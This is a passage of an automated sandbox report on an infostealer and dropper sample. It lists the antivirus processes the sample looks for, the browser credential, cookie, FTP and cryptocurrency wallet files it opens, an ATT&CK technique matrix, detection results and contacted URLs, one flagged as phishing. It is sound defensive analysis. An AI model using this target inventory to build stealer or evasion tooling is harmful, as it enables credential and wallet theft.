                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbamsvc.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgnsx.exe
                          Source: e44fda3216.exe, e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2789195144.0000000000627000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2466989559.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2772005516.0000000000622000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2465911850.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476241959.0000000000623000.00000004.00000020.00020000.00000000.sdmp, NzL6O1Q.exe, 00000014.00000002.3342608524.000000001B72F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 00000035.00000003.2524405959.0000022087AA4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317977394.0000022087AAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savservice.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsmon.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a2service.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsma32.exe
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: 5.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: e44fda3216.exe PID: 1608, type: MEMORYSTR
                          Source: Yara matchFile source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: NzL6O1Q.exe PID: 2112, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZ
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeDirectory queried: number of queries: 1001
                          Source: Yara matchFile source: Process Memory Space: e44fda3216.exe PID: 1608, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara matchFile source: Process Memory Space: e44fda3216.exe PID: 1608, type: MEMORYSTR
                          Source: Yara matchFile source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: NzL6O1Q.exe PID: 2112, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,5_2_0042EC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,5_2_0042DF51
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 231 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Native API | 12 Windows Service | 12 Windows Service | 111 Deobfuscate/Decode Files or Information | LSASS Memory | 22 File and Directory Discovery | Remote Desktop Protocol | 31 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 12 Scheduled Task/Job | 112 Process Injection | 4 Obfuscated Files or Information | Security Account Manager | 356 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 12 Scheduled Task/Job | 121 Registry Run Keys / Startup Folder | 12 Scheduled Task/Job | 24 Software Packing | NTDS | 1181 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | 1 Service Execution | Network Logon Script | 121 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | 2 PowerShell | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 581 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 581 Virtualization/Sandbox Evasion | Proc Filesystem | 2 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                          [Behavior graph] ID: 1585651 | Sample: file.exe | Startdate: 07/01/2025 | Architecture: WINDOWS | Score: 100

                          Source | Detection | Scanner | Label | Link
                          file.exe | 58% | ReversingLabs | Win32.Infostealer.Tinba |
                          file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                          file.exe | 100% | Joe Sandbox ML | |
                          Source | Detection | Scanner | Label | Link
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 100% | Avira | TR/Crypt.TPM.Gen |
                          C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                          C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe | 100% | Avira | TR/Dropper.Gen2 |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe | 100% | Avira | TR/Dropper.Gen2 |
                          C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe | 100% | Avira | HEUR/AGEN.1320706 |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe | 100% | Avira | TR/Crypt.TPM.Gen |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 100% | Avira | HEUR/AGEN.1320706 |
                          C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 100% | Joe Sandbox ML | |
                          C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe | 100% | Joe Sandbox ML | |
                          C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe | 78% | ReversingLabs | Win64.Trojan.MintZard |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exe | 16% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe | 13% | ReversingLabs | Win32.Ransomware.TelegramRAT |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zjFtdxQ[1].exe | 3% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe | 37% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe | 16% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe | 3% | ReversingLabs | |
                          C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
                          C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe | 13% | ReversingLabs | Win32.Ransomware.TelegramRAT |
                          C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exe | 37% | ReversingLabs | |
                          No Antivirus matches
                          No Antivirus matches
                          No contacted domains info
                                                        high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://letterdrive.shop/mfilJe44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://contoso.com/Iconpowershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.ver)svchost.exe, 0000000A.00000002.3339202766.0000026F20A0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctae44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpllsvchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      http://ocsp.rootca1.amazontrust.com0:e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpvohvtbtkkqqpcgvysvchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://www.ecosia.org/newtab/e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bre44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpfalse
